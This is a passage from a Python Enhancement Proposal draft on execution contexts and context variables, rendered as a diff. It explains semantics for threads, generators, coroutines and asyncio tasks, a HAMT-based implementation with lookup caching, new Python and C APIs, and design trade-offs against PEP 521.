This is because implicit Decimal context is stored as a thread-local, +so concurrent iteration of the fractions() generator would +corrupt the state. For Decimal, specifically, the only current +workaround is to use explicit context method calls for all arithmetic +operations [28]. Arguably, this defeats the usefulness of overloaded +operators and makes even simple formulas hard to read and write.

+

Coroutines are another class of Python code where TLS unreliability +is a significant issue.

+

The inadequacy of TLS in asynchronous code has lead to the +proliferation of ad-hoc solutions, which are limited in scope and +do not support all required use cases.

+

The current status quo is that any library (including the standard +library), which relies on TLS, is likely to be broken when used in +asynchronous code or with generators (see [3] as an example issue.)

+

Some languages, that support coroutines or generators, recommend +passing the context manually as an argument to every function, see +[1] for an example. This approach, however, has limited use for +Python, where there is a large ecosystem that was built to work with +a TLS-like context. Furthermore, libraries like decimal or +numpy rely on context implicitly in overloaded operator +implementations.

+

The .NET runtime, which has support for async/await, has a generic +solution for this problem, called ExecutionContext (see [2]).

+
+
+

Goals

+

The goal of this PEP is to provide a more reliable +threading.local() alternative, which:

+
    +
  • provides the mechanism and the API to fix non-local state issues +with coroutines and generators;
  • +
  • implements TLS-like semantics for synchronous code, so that +users like decimal and numpy can switch to the new +mechanism with minimal risk of breaking backwards compatibility;
  • +
  • has no or negligible performance impact on the existing code or +the code that will be using the new mechanism, including +C extensions.
  • +
+
+
+

High-Level Specification

+

The full specification of this PEP is broken down into three parts:

+
    +
  • High-Level Specification (this section): the description of the +overall solution. We show how it applies to generators and +coroutines in user code, without delving into implementation +details.
  • +
  • Detailed Specification: the complete description of new concepts, +APIs, and related changes to the standard library.
  • +
  • Implementation Details: the description and analysis of data +structures and algorithms used to implement this PEP, as well as +the necessary changes to CPython.
  • +
+

For the purpose of this section, we define execution context as an +opaque container of non-local state that allows consistent access to +its contents in the concurrent execution environment.

+

A context variable is an object representing a value in the +execution context. A call to contextvars.ContextVar(name) +creates a new context variable object. A context variable object has +three methods:

+
    +
  • get(): returns the value of the variable in the current +execution context;
  • +
  • set(value): sets the value of the variable in the current +execution context;
  • +
  • delete(): can be used for restoring variable state, it’s +purpose and semantics are explained in +Setting and restoring context variables.
  • +
+
+

Regular Single-threaded Code

+

In regular, single-threaded code that doesn’t involve generators or +coroutines, context variables behave like globals:

+
var = contextvars.ContextVar('var')
+
+def sub():
+    assert var.get() == 'main'
+    var.set('sub')
+
+def main():
+    var.set('main')
+    sub()
+    assert var.get() == 'sub'
+
+
+
+
+

Multithreaded Code

+

In multithreaded code, context variables behave like thread locals:

+
var = contextvars.ContextVar('var')
+
+def sub():
+    assert var.get() is None  # The execution context is empty
+                              # for each new thread.
+    var.set('sub')
+
+def main():
+    var.set('main')
+
+    thread = threading.Thread(target=sub)
+    thread.start()
+    thread.join()
+
+    assert var.get() == 'main'
+
+
+
+
+

Generators

+

Unlike regular function calls, generators can cooperatively yield +their control of execution to the caller. Furthermore, a generator +does not control where the execution would continue after it yields. +It may be resumed from an arbitrary code location.

+

For these reasons, the least surprising behaviour of generators is +as follows:

+
    +
  • changes to context variables are always local and are not visible +in the outer context, but are visible to the code called by the +generator;
  • +
  • once set in the generator, the context variable is guaranteed not +to change between iterations;
  • +
  • changes to context variables in outer context (where the generator +is being iterated) are visible to the generator, unless these +variables were also modified inside the generator.
  • +
+

Let’s review:

+
var1 = contextvars.ContextVar('var1')
+var2 = contextvars.ContextVar('var2')
+
+def gen():
+    var1.set('gen')
+    assert var1.get() == 'gen'
+    assert var2.get() == 'main'
+    yield 1
+
+    # Modification to var1 in main() is shielded by
+    # gen()'s local modification.
+    assert var1.get() == 'gen'
+
+    # But modifications to var2 are visible
+    assert var2.get() == 'main modified'
+    yield 2
+
+def main():
+    g = gen()
+
+    var1.set('main')
+    var2.set('main')
+    next(g)
+
+    # Modification of var1 in gen() is not visible.
+    assert var1.get() == 'main'
+
+    var1.set('main modified')
+    var2.set('main modified')
+    next(g)
+
+
+

Now, let’s revisit the decimal precision example from the Rationale +section, and see how the execution context can improve the situation:

+
import decimal
+
+# create a new context var
+decimal_ctx = contextvars.ContextVar('decimal context')
+
+# Pre-PEP 550 Decimal relies on TLS for its context.
+# For illustration purposes, we monkey-patch the decimal
+# context functions to use the execution context.
+# A real working fix would need to properly update the
+# C implementation as well.
+def patched_setcontext(context):
+    decimal_ctx.set(context)
+
+def patched_getcontext():
+    ctx = decimal_ctx.get()
+    if ctx is None:
+        ctx = decimal.Context()
+        decimal_ctx.set(ctx)
+    return ctx
+
+decimal.setcontext = patched_setcontext
+decimal.getcontext = patched_getcontext
+
+def fractions(precision, x, y):
+    with decimal.localcontext() as ctx:
+        ctx.prec = precision
+        yield MyDecimal(x) / MyDecimal(y)
+        yield MyDecimal(x) / MyDecimal(y ** 2)
+
+g1 = fractions(precision=2, x=1, y=3)
+g2 = fractions(precision=6, x=2, y=3)
+
+items = list(zip(g1, g2))
+
+
+

The value of items is:

+
[(Decimal('0.33'), Decimal('0.666667')),
+ (Decimal('0.11'), Decimal('0.222222'))]
+
+
+

which matches the expected result.

+
+
+

Coroutines and Asynchronous Tasks

+

Like generators, coroutines can yield and regain control. The major +difference from generators is that coroutines do not yield to the +immediate caller. Instead, the entire coroutine call stack +(coroutines chained by await) switches to another coroutine call +stack. In this regard, await-ing on a coroutine is conceptually +similar to a regular function call, and a coroutine chain +(or a “task”, e.g. an asyncio.Task) is conceptually similar to a +thread.

+

From this similarity we conclude that context variables in coroutines +should behave like “task locals”:

+
    +
  • changes to context variables in a coroutine are visible to the +coroutine that awaits on it;
  • +
  • changes to context variables made in the caller prior to awaiting +are visible to the awaited coroutine;
  • +
  • changes to context variables made in one task are not visible in +other tasks;
  • +
  • tasks spawned by other tasks inherit the execution context from the +parent task, but any changes to context variables made in the +parent task after the child task was spawned are not visible.
  • +
+

The last point shows behaviour that is different from OS threads. +OS threads do not inherit the execution context by default. +There are two reasons for this: common usage intent and backwards +compatibility.

+

The main reason for why tasks inherit the context, and threads do +not, is the common usage intent. Tasks are often used for relatively +short-running operations which are logically tied to the code that +spawned the task (like running a coroutine with a timeout in +asyncio). OS threads, on the other hand, are normally used for +long-running, logically separate code.

+

With respect to backwards compatibility, we want the execution context +to behave like threading.local(). This is so that libraries can +start using the execution context in place of TLS with a lesser risk +of breaking compatibility with existing code.

+

Let’s review a few examples to illustrate the semantics we have just +defined.

+

Context variable propagation in a single task:

+
import asyncio
+
+var = contextvars.ContextVar('var')
+
+async def main():
+    var.set('main')
+    await sub()
+    # The effect of sub() is visible.
+    assert var.get() == 'sub'
+
+async def sub():
+    assert var.get() == 'main'
+    var.set('sub')
+    assert var.get() == 'sub'
+
+loop = asyncio.get_event_loop()
+loop.run_until_complete(main())
+
+
+

Context variable propagation between tasks:

+
import asyncio
+
+var = contextvars.ContextVar('var')
+
+async def main():
+    var.set('main')
+    loop.create_task(sub())  # schedules asynchronous execution
+                             # of sub().
+    assert var.get() == 'main'
+    var.set('main changed')
+
+async def sub():
+    # Sleeping will make sub() run after
+    # "var" is modified in main().
+    await asyncio.sleep(1)
+
+    # The value of "var" is inherited from main(), but any
+    # changes to "var" made in main() after the task
+    # was created are *not* visible.
+    assert var.get() == 'main'
+
+    # This change is local to sub() and will not be visible
+    # to other tasks, including main().
+    var.set('sub')
+
+loop = asyncio.get_event_loop()
+loop.run_until_complete(main())
+
+
+

As shown above, changes to the execution context are local to the +task, and tasks get a snapshot of the execution context at the point +of creation.

+

There is one narrow edge case when this can lead to surprising +behaviour. Consider the following example where we modify the +context variable in a nested coroutine:

+
async def sub(var_value):
+    await asyncio.sleep(1)
+    var.set(var_value)
+
+async def main():
+    var.set('main')
+
+    # waiting for sub() directly
+    await sub('sub-1')
+
+    # var change is visible
+    assert var.get() == 'sub-1'
+
+    # waiting for sub() with a timeout;
+    await asyncio.wait_for(sub('sub-2'), timeout=2)
+
+    # wait_for() creates an implicit task, which isolates
+    # context changes, which means that the below assertion
+    # will fail.
+    assert var.get() == 'sub-2'  #  AssertionError!
+
+
+

However, relying on context changes leaking to the caller is +ultimately a bad pattern. For this reason, the behaviour shown in +the above example is not considered a major issue and can be +addressed with proper documentation.

+
+
+
+

Detailed Specification

+

Conceptually, an execution context (EC) is a stack of logical +contexts. There is always exactly one active EC per Python thread.

+

A logical context (LC) is a mapping of context variables to their +values in that particular LC.

+

A context variable is an object representing a value in the +execution context. A new context variable object is created by +calling contextvars.ContextVar(name: str). The value of the +required name argument is not used by the EC machinery, but may +be used for debugging and introspection.

+

The context variable object has the following methods and attributes:

+
    +
  • name: the value passed to ContextVar().
  • +
  • get(*, topmost=False, default=None), if topmost is False +(the default), traverses the execution context top-to-bottom, until +the variable value is found. If topmost is True, returns +the value of the variable in the topmost logical context. +If the variable value was not found, returns the value of default.
  • +
  • set(value): sets the value of the variable in the topmost +logical context.
  • +
  • delete(): removes the variable from the topmost logical context. +Useful when restoring the logical context to the state prior to the +set() call, for example, in a context manager, see +Setting and restoring context variables for more information.
  • +
+
+

Generators

+

When created, each generator object has an empty logical context +object stored in its __logical_context__ attribute. This logical +context is pushed onto the execution context at the beginning of each +generator iteration and popped at the end:

+
var1 = contextvars.ContextVar('var1')
+var2 = contextvars.ContextVar('var2')
+
+def gen():
+    var1.set('var1-gen')
+    var2.set('var2-gen')
+
+    # EC = [
+    #     outer_LC(),
+    #     gen_LC({var1: 'var1-gen', var2: 'var2-gen'})
+    # ]
+    n = nested_gen()  # nested_gen_LC is created
+    next(n)
+    # EC = [
+    #     outer_LC(),
+    #     gen_LC({var1: 'var1-gen', var2: 'var2-gen'})
+    # ]
+
+    var1.set('var1-gen-mod')
+    var2.set('var2-gen-mod')
+    # EC = [
+    #     outer_LC(),
+    #     gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'})
+    # ]
+    next(n)
+
+def nested_gen():
+    # EC = [
+    #     outer_LC(),
+    #     gen_LC({var1: 'var1-gen', var2: 'var2-gen'}),
+    #     nested_gen_LC()
+    # ]
+    assert var1.get() == 'var1-gen'
+    assert var2.get() == 'var2-gen'
+
+    var1.set('var1-nested-gen')
+    # EC = [
+    #     outer_LC(),
+    #     gen_LC({var1: 'var1-gen', var2: 'var2-gen'}),
+    #     nested_gen_LC({var1: 'var1-nested-gen'})
+    # ]
+    yield
+
+    # EC = [
+    #     outer_LC(),
+    #     gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'}),
+    #     nested_gen_LC({var1: 'var1-nested-gen'})
+    # ]
+    assert var1.get() == 'var1-nested-gen'
+    assert var2.get() == 'var2-gen-mod'
+
+    yield
+
+# EC = [outer_LC()]
+
+g = gen()  # gen_LC is created for the generator object `g`
+list(g)
+
+# EC = [outer_LC()]
+
+
+

The snippet above shows the state of the execution context stack +throughout the generator lifespan.

+
+
+

contextlib.contextmanager

+

The contextlib.contextmanager() decorator can be used to turn +a generator into a context manager. A context manager that +temporarily modifies the value of a context variable could be defined +like this:

+
var = contextvars.ContextVar('var')
+
+@contextlib.contextmanager
+def var_context(value):
+    original_value = var.get()
+
+    try:
+        var.set(value)
+        yield
+    finally:
+        var.set(original_value)
+
+
+

Unfortunately, this would not work straight away, as the modification +to the var variable is contained to the var_context() +generator, and therefore will not be visible inside the with +block:

+
def func():
+    # EC = [{}, {}]
+
+    with var_context(10):
+        # EC becomes [{}, {}, {var: 10}] in the
+        # *precision_context()* generator,
+        # but here the EC is still [{}, {}]
+
+        assert var.get() == 10  # AssertionError!
+
+
+

The way to fix this is to set the generator’s __logical_context__ +attribute to None. This will cause the generator to avoid +modifying the execution context stack.

+

We modify the contextlib.contextmanager() decorator to +set genobj.__logical_context__ to None to produce +well-behaved context managers:

+
def func():
+    # EC = [{}, {}]
+
+    with var_context(10):
+        # EC = [{}, {var: 10}]
+        assert var.get() == 10
+
+    # EC becomes [{}, {var: None}]
+
+
+
+
+

Enumerating context vars

+

The ExecutionContext.vars() method returns a list of +ContextVar objects, that have values in the execution context. +This method is mostly useful for introspection and logging.

+
+
+

coroutines

+

In CPython, coroutines share the implementation with generators. +The difference is that in coroutines __logical_context__ defaults +to None. This affects both the async def coroutines and the +old-style generator-based coroutines (generators decorated with +@types.coroutine).

+
+
+

Asynchronous Generators

+

The execution context semantics in asynchronous generators does not +differ from that of regular generators.

+
+
+

asyncio

+

asyncio uses Loop.call_soon, Loop.call_later, +and Loop.call_at to schedule the asynchronous execution of a +function. asyncio.Task uses call_soon() to run the +wrapped coroutine.

+

We modify Loop.call_{at,later,soon} to accept the new +optional execution_context keyword argument, which defaults to +the copy of the current execution context:

+
def call_soon(self, callback, *args, execution_context=None):
+    if execution_context is None:
+        execution_context = contextvars.get_execution_context()
+
+    # ... some time later
+
+    contextvars.run_with_execution_context(
+        execution_context, callback, args)
+
+
+

The contextvars.get_execution_context() function returns a +shallow copy of the current execution context. By shallow copy here +we mean such a new execution context that:

+
    +
  • lookups in the copy provide the same results as in the original +execution context, and
  • +
  • any changes in the original execution context do not affect the +copy, and
  • +
  • any changes to the copy do not affect the original execution +context.
  • +
+

Either of the following satisfy the copy requirements:

+
    +
  • a new stack with shallow copies of logical contexts;
  • +
  • a new stack with one squashed logical context.
  • +
+

The contextvars.run_with_execution_context(ec, func, *args, +**kwargs) function runs func(*args, **kwargs) with ec as the +execution context. The function performs the following steps:

+
    +
  1. Set ec as the current execution context stack in the current +thread.
  2. +
  3. Push an empty logical context onto the stack.
  4. +
  5. Run func(*args, **kwargs).
  6. +
  7. Pop the logical context from the stack.
  8. +
  9. Restore the original execution context stack.
  10. +
  11. Return or raise the func() result.
  12. +
+

These steps ensure that ec cannot be modified by func, +which makes run_with_execution_context() idempotent.

+

asyncio.Task is modified as follows:

+
class Task:
+    def __init__(self, coro):
+        ...
+        # Get the current execution context snapshot.
+        self._exec_context = contextvars.get_execution_context()
+
+        # Create an empty Logical Context that will be
+        # used by coroutines run in the task.
+        coro.__logical_context__ = contextvars.LogicalContext()
+
+        self._loop.call_soon(
+            self._step,
+            execution_context=self._exec_context)
+
+    def _step(self, exc=None):
+        ...
+        self._loop.call_soon(
+            self._step,
+            execution_context=self._exec_context)
+        ...
+
+
+
+
+

Generators Transformed into Iterators

+

Any Python generator can be represented as an equivalent iterator. +Compilers like Cython rely on this axiom. With respect to the +execution context, such iterator should behave the same way as the +generator it represents.

+

This means that there needs to be a Python API to create new logical +contexts and run code with a given logical context.

+

The contextvars.LogicalContext() function creates a new empty +logical context.

+

The contextvars.run_with_logical_context(lc, func, *args, +**kwargs) function can be used to run functions in the specified +logical context. The lc can be modified as a result of the call.

+

The contextvars.run_with_logical_context() function performs the +following steps:

+
    +
  1. Push lc onto the current execution context stack.
  2. +
  3. Run func(*args, **kwargs).
  4. +
  5. Pop lc from the execution context stack.
  6. +
  7. Return or raise the func() result.
  8. +
+

By using LogicalContext() and run_with_logical_context(), +we can replicate the generator behaviour like this:

+
class Generator:
+
+    def __init__(self):
+        self.logical_context = contextvars.LogicalContext()
+
+    def __iter__(self):
+        return self
+
+    def __next__(self):
+        return contextvars.run_with_logical_context(
+            self.logical_context, self._next_impl)
+
+    def _next_impl(self):
+        # Actual __next__ implementation.
+        ...
+
+
+

Let’s see how this pattern can be applied to an example generator:

+
# create a new context variable
+var = contextvars.ContextVar('var')
+
+def gen_series(n):
+    var.set(10)
+
+    for i in range(1, n):
+        yield var.get() * i
+
+# gen_series is equivalent to the following iterator:
+
+class CompiledGenSeries:
+
+    # This class is what the `gen_series()` generator can
+    # be transformed to by a compiler like Cython.
+
+    def __init__(self, n):
+        # Create a new empty logical context,
+        # like the generators do.
+        self.logical_context = contextvars.LogicalContext()
+
+        # Initialize the generator in its LC.
+        # Otherwise `var.set(10)` in the `_init` method
+        # would leak.
+        contextvars.run_with_logical_context(
+            self.logical_context, self._init, n)
+
+    def _init(self, n):
+        self.i = 1
+        self.n = n
+        var.set(10)
+
+    def __iter__(self):
+        return self
+
+    def __next__(self):
+        # Run the actual implementation of __next__ in our LC.
+        return contextvars.run_with_logical_context(
+            self.logical_context, self._next_impl)
+
+    def _next_impl(self):
+        if self.i == self.n:
+            raise StopIteration
+
+        result = var.get() * self.i
+        self.i += 1
+        return result
+
+
+

For hand-written iterators such approach to context management is +normally not necessary, and it is easier to set and restore +context variables directly in __next__:

+
class MyIterator:
+
+    # ...
+
+    def __next__(self):
+        old_val = var.get()
+        try:
+            var.set(new_val)
+            # ...
+        finally:
+            var.set(old_val)
+
+
+
+
+
+

Implementation

+

Execution context is implemented as an immutable linked list of +logical contexts, where each logical context is an immutable weak key +mapping. A pointer to the currently active execution context is +stored in the OS thread state:

+
                  +-----------------+
+                  |                 |     ec
+                  |  PyThreadState  +-------------+
+                  |                 |             |
+                  +-----------------+             |
+                                                  |
+ec_node             ec_node             ec_node   v
++------+------+     +------+------+     +------+------+
+| NULL |  lc  |<----| prev |  lc  |<----| prev |  lc  |
++------+--+---+     +------+--+---+     +------+--+---+
+          |                   |                   |
+LC        v         LC        v         LC        v
++-------------+     +-------------+     +-------------+
+| var1: obj1  |     |    EMPTY    |     | var1: obj4  |
+| var2: obj2  |     +-------------+     +-------------+
+| var3: obj3  |
++-------------+
+
+
+

The choice of the immutable list of immutable mappings as a +fundamental data structure is motivated by the need to efficiently +implement contextvars.get_execution_context(), which is to be +frequently used by asynchronous tasks and callbacks. When the EC is +immutable, get_execution_context() can simply copy the current +execution context by reference:

+
def get_execution_context(self):
+    return PyThreadState_Get().ec
+
+
+

Let’s review all possible context modification scenarios:

+
    +
  • The ContextVariable.set() method is called:
    def ContextVar_set(self, val):
    +    # See a more complete set() definition
    +    # in the `Context Variables` section.
    +
    +    tstate = PyThreadState_Get()
    +    top_ec_node = tstate.ec
    +    top_lc = top_ec_node.lc
    +    new_top_lc = top_lc.set(self, val)
    +    tstate.ec = ec_node(
    +        prev=top_ec_node.prev,
    +        lc=new_top_lc)
    +
    +
    +
  • +
  • The contextvars.run_with_logical_context() is called, in which +case the passed logical context object is appended to the execution +context:
    def run_with_logical_context(lc, func, *args, **kwargs):
    +    tstate = PyThreadState_Get()
    +
    +    old_top_ec_node = tstate.ec
    +    new_top_ec_node = ec_node(prev=old_top_ec_node, lc=lc)
    +
    +    try:
    +        tstate.ec = new_top_ec_node
    +        return func(*args, **kwargs)
    +    finally:
    +        tstate.ec = old_top_ec_node
    +
    +
    +
  • +
  • The contextvars.run_with_execution_context() is called, in which +case the current execution context is set to the passed execution +context with a new empty logical context appended to it:
    def run_with_execution_context(ec, func, *args, **kwargs):
    +    tstate = PyThreadState_Get()
    +
    +    old_top_ec_node = tstate.ec
    +    new_lc = contextvars.LogicalContext()
    +    new_top_ec_node = ec_node(prev=ec, lc=new_lc)
    +
    +    try:
    +        tstate.ec = new_top_ec_node
    +        return func(*args, **kwargs)
    +    finally:
    +        tstate.ec = old_top_ec_node
    +
    +
    +
  • +
  • Either genobj.send(), genobj.throw(), genobj.close() +are called on a genobj generator, in which case the logical +context recorded in genobj is pushed onto the stack:
    PyGen_New(PyGenObject *gen):
    +    if (gen.gi_code.co_flags &
    +            (CO_COROUTINE | CO_ITERABLE_COROUTINE)):
    +        # gen is an 'async def' coroutine, or a generator
    +        # decorated with @types.coroutine.
    +        gen.__logical_context__ = None
    +    else:
    +        # Non-coroutine generator
    +        gen.__logical_context__ = contextvars.LogicalContext()
    +
    +gen_send(PyGenObject *gen, ...):
    +    tstate = PyThreadState_Get()
    +
    +    if gen.__logical_context__ is not None:
    +        old_top_ec_node = tstate.ec
    +        new_top_ec_node = ec_node(
    +            prev=old_top_ec_node,
    +            lc=gen.__logical_context__)
    +
    +        try:
    +            tstate.ec = new_top_ec_node
    +            return _gen_send_impl(gen, ...)
    +        finally:
    +            gen.__logical_context__ = tstate.ec.lc
    +            tstate.ec = old_top_ec_node
    +    else:
    +        return _gen_send_impl(gen, ...)
    +
    +
    +
  • +
  • Coroutines and asynchronous generators share the implementation +with generators, and the above changes apply to them as well.
  • +
+

In certain scenarios the EC may need to be squashed to limit the +size of the chain. For example, consider the following corner case:

+
async def repeat(coro, delay):
+    await coro()
+    await asyncio.sleep(delay)
+    loop.create_task(repeat(coro, delay))
+
+async def ping():
+    print('ping')
+
+loop = asyncio.get_event_loop()
+loop.create_task(repeat(ping, 1))
+loop.run_forever()
+
+
+

In the above code, the EC chain will grow as long as repeat() is +called. Each new task will call +contextvars.run_with_execution_context(), which will append a new +logical context to the chain. To prevent unbounded growth, +contextvars.get_execution_context() checks if the chain +is longer than a predetermined maximum, and if it is, squashes the +chain into a single LC:

+
def get_execution_context():
+    tstate = PyThreadState_Get()
+
+    if tstate.ec_len > EC_LEN_MAX:
+        squashed_lc = contextvars.LogicalContext()
+
+        ec_node = tstate.ec
+        while ec_node:
+            # The LC.merge() method does not replace
+            # existing keys.
+            squashed_lc = squashed_lc.merge(ec_node.lc)
+            ec_node = ec_node.prev
+
+        return ec_node(prev=NULL, lc=squashed_lc)
+    else:
+        return tstate.ec
+
+
+
+

Logical Context

+

Logical context is an immutable weak key mapping which has the +following properties with respect to garbage collection:

+
    +
  • ContextVar objects are strongly-referenced only from the +application code, not from any of the execution context machinery +or values they point to. This means that there are no reference +cycles that could extend their lifespan longer than necessary, or +prevent their collection by the GC.
  • +
  • Values put in the execution context are guaranteed to be kept +alive while there is a ContextVar key referencing them in +the thread.
  • +
  • If a ContextVar is garbage collected, all of its values will +be removed from all contexts, allowing them to be GCed if needed.
  • +
  • If an OS thread has ended its execution, its thread state will be +cleaned up along with its execution context, cleaning +up all values bound to all context variables in the thread.
  • +
+

As discussed earlier, we need contextvars.get_execution_context() +to be consistently fast regardless of the size of the execution +context, so logical context is necessarily an immutable mapping.

+

Choosing dict for the underlying implementation is suboptimal, +because LC.set() will cause dict.copy(), which is an O(N) +operation, where N is the number of items in the LC.

+

get_execution_context(), when squashing the EC, is an O(M) +operation, where M is the total number of context variable values +in the EC.

+

So, instead of dict, we choose Hash Array Mapped Trie (HAMT) +as the underlying implementation of logical contexts. (Scala and +Clojure use HAMT to implement high performance immutable collections +[5], [6].)

+

With HAMT .set() becomes an O(log N) operation, and +get_execution_context() squashing is more efficient on average due +to structural sharing in HAMT.

+

See Appendix: HAMT Performance Analysis for a more elaborate +analysis of HAMT performance compared to dict.

+
+
+

Context Variables

+

The ContextVar.get() and ContextVar.set() methods are +implemented as follows (in pseudo-code):

+
class ContextVar:
+
+    def get(self, *, default=None, topmost=False):
+        tstate = PyThreadState_Get()
+
+        ec_node = tstate.ec
+        while ec_node:
+            if self in ec_node.lc:
+                return ec_node.lc[self]
+            if topmost:
+                break
+            ec_node = ec_node.prev
+
+        return default
+
+    def set(self, value):
+        tstate = PyThreadState_Get()
+        top_ec_node = tstate.ec
+
+        if top_ec_node is not None:
+            top_lc = top_ec_node.lc
+            new_top_lc = top_lc.set(self, value)
+            tstate.ec = ec_node(
+                prev=top_ec_node.prev,
+                lc=new_top_lc)
+        else:
+            # First ContextVar.set() in this OS thread.
+            top_lc = contextvars.LogicalContext()
+            new_top_lc = top_lc.set(self, value)
+            tstate.ec = ec_node(
+                prev=NULL,
+                lc=new_top_lc)
+
+    def delete(self):
+        tstate = PyThreadState_Get()
+        top_ec_node = tstate.ec
+
+        if top_ec_node is None:
+            raise LookupError
+
+        top_lc = top_ec_node.lc
+        if self not in top_lc:
+            raise LookupError
+
+        new_top_lc = top_lc.delete(self)
+
+        tstate.ec = ec_node(
+            prev=top_ec_node.prev,
+            lc=new_top_lc)
+
+
+

For efficient access in performance-sensitive code paths, such as in +numpy and decimal, we cache lookups in ContextVar.get(), +making it an O(1) operation when the cache is hit. The cache key is +composed from the following:

+
    +
  • The new uint64_t PyThreadState->unique_id, which is a globally +unique thread state identifier. It is computed from the new +uint64_t PyInterpreterState->ts_counter, which is incremented +whenever a new thread state is created.
  • +
  • The new uint64_t PyThreadState->stack_version, which is a +thread-specific counter, which is incremented whenever a non-empty +logical context is pushed onto the stack or popped from the stack.
  • +
  • The uint64_t ContextVar->version counter, which is incremented +whenever the context variable value is changed in any logical +context in any OS thread.
  • +
+

The cache is then implemented as follows:

+
class ContextVar:
+
+    def set(self, value):
+        ...  # implementation
+        self.version += 1
+
+    def get(self, *, default=None, topmost=False):
+        if topmost:
+            return self._get_uncached(
+                default=default, topmost=topmost)
+
+        tstate = PyThreadState_Get()
+        if (self.last_tstate_id == tstate.unique_id and
+                self.last_stack_ver == tstate.stack_version and
+                self.last_version == self.version):
+            return self.last_value
+
+        value = self._get_uncached(default=default)
+
+        self.last_value = value  # borrowed ref
+        self.last_tstate_id = tstate.unique_id
+        self.last_stack_version = tstate.stack_version
+        self.last_version = self.version
+
+        return value
+
+
+

Note that last_value is a borrowed reference. We assume that +if the version checks are fine, the value object will be alive. +This allows the values of context variables to be properly garbage +collected.

+

This generic caching approach is similar to what the current C +implementation of decimal does to cache the current decimal +context, and has similar performance characteristics.

+
+
+
+

Performance Considerations

+

Tests of the reference implementation based on the prior +revisions of this PEP have shown 1-2% slowdown on generator +microbenchmarks and no noticeable difference in macrobenchmarks.

+

The performance of non-generator and non-async code is not +affected by this PEP.

+
+
+

Summary of the New APIs

+
+

Python

+

The following new Python APIs are introduced by this PEP:

+
    +
  1. The new contextvars.ContextVar(name: str='...') class, +instances of which have the following:
      +
    • the read-only .name attribute,
    • +
    • the .get() method, which returns the value of the variable +in the current execution context;
    • +
    • the .set() method, which sets the value of the variable in +the current logical context;
    • +
    • the .delete() method, which removes the value of the variable +from the current logical context.
    • +
    +
  2. +
  3. The new contextvars.ExecutionContext() class, which represents +an execution context.
  4. +
  5. The new contextvars.LogicalContext() class, which represents +a logical context.
  6. +
  7. The new contextvars.get_execution_context() function, which +returns an ExecutionContext instance representing a copy of +the current execution context.
  8. +
  9. The contextvars.run_with_execution_context(ec: ExecutionContext, +func, *args, **kwargs) function, which runs func with the +provided execution context.
  10. +
  11. The contextvars.run_with_logical_context(lc: LogicalContext, +func, *args, **kwargs) function, which runs func with the +provided logical context on top of the current execution context.
  12. +
+
+
+

C API

+
    +
  1. PyContextVar * PyContext_NewVar(char *desc): create a +PyContextVar object.
  2. +
  3. PyObject * PyContext_GetValue(PyContextVar *, int topmost): +return the value of the variable in the current execution context.
  4. +
  5. int PyContext_SetValue(PyContextVar *, PyObject *): set +the value of the variable in the current logical context.
  6. +
  7. int PyContext_DelValue(PyContextVar *): delete the value of +the variable from the current logical context.
  8. +
  9. PyLogicalContext * PyLogicalContext_New(): create a new empty +PyLogicalContext.
  10. +
  11. PyExecutionContext * PyExecutionContext_New(): create a new +empty PyExecutionContext.
  12. +
  13. PyExecutionContext * PyExecutionContext_Get(): return the +current execution context.
  14. +
  15. int PyContext_SetCurrent( +PyExecutionContext *, PyLogicalContext *): set the +passed EC object as the current execution context for the active +thread state, and/or set the passed LC object as the current +logical context.
  16. +
+
+
+
+

Design Considerations

+
+

Should “yield from” leak context changes?

+

No. It may be argued that yield from is semantically +equivalent to calling a function, and should leak context changes. +However, it is not possible to satisfy the following at the same time:

+
    +
  • next(gen) does not leak context changes made in gen, and
  • +
  • yield from gen leaks context changes made in gen.
  • +
+

The reason is that yield from can be used with a partially +iterated generator, which already has local context changes:

+
var = contextvars.ContextVar('var')
+
+def gen():
+    for i in range(10):
+        var.set('gen')
+        yield i
+
+def outer_gen():
+    var.set('outer_gen')
+    g = gen()
+
+    yield next(g)
+    # Changes not visible during partial iteration,
+    # the goal of this PEP:
+    assert var.get() == 'outer_gen'
+
+    yield from g
+    assert var.get() == 'outer_gen'  # or 'gen'?
+
+
+

Another example would be refactoring of an explicit for..in yield +construct to a yield from expression. Consider the following +code:

+
def outer_gen():
+    var.set('outer_gen')
+
+    for i in gen():
+        yield i
+    assert var.get() == 'outer_gen'
+
+
+

which we want to refactor to use yield from:

+
def outer_gen():
+    var.set('outer_gen')
+
+    yield from gen()
+    assert var.get() == 'outer_gen'  # or 'gen'?
+
+
+

The above examples illustrate that it is unsafe to refactor +generator code using yield from when it can leak context changes.

+

Thus, the only well-defined and consistent behaviour is to +always isolate context changes in generators, regardless of +how they are being iterated.

+
+
+

Should PyThreadState_GetDict() use the execution context?

+

No. PyThreadState_GetDict is based on TLS, and changing its +semantics will break backwards compatibility.

+
+
+

PEP 521

+

PEP 521 proposes an alternative solution to the problem, which +extends the context manager protocol with two new methods: +__suspend__() and __resume__(). Similarly, the asynchronous +context manager protocol is also extended with __asuspend__() and +__aresume__().

+

This allows implementing context managers that manage non-local state, +which behave correctly in generators and coroutines.

+

For example, consider the following context manager, which uses +execution state:

+
class Context:
+
+    def __init__(self):
+        self.var = contextvars.ContextVar('var')
+
+    def __enter__(self):
+        self.old_x = self.var.get()
+        self.var.set('something')
+
+    def __exit__(self, *err):
+        self.var.set(self.old_x)
+
+
+

An equivalent implementation with PEP 521:

+
local = threading.local()
+
+class Context:
+
+    def __enter__(self):
+        self.old_x = getattr(local, 'x', None)
+        local.x = 'something'
+
+    def __suspend__(self):
+        local.x = self.old_x
+
+    def __resume__(self):
+        local.x = 'something'
+
+    def __exit__(self, *err):
+        local.x = self.old_x
+
+
+

The downside of this approach is the addition of significant new +complexity to the context manager protocol and the interpreter +implementation. This approach is also likely to negatively impact +the performance of generators and coroutines.

+

Additionally, the solution in PEP 521 is limited to context +managers, and does not provide any mechanism to propagate state in +asynchronous tasks and callbacks.

+
+
+

Can Execution Context be implemented without modifying CPython?

+

No.

+

It is true that the concept of “task-locals” can be implemented +for coroutines in libraries (see, for example, [29] and [30]). +On the other hand, generators are managed by the Python interpreter +directly, and so their context must also be managed by the +interpreter.

+

Furthermore, execution context cannot be implemented in a third-party +module at all, otherwise the standard library, including decimal +would not be able to rely on it.

+
+
+

Should we update sys.displayhook and other APIs to use EC?

+

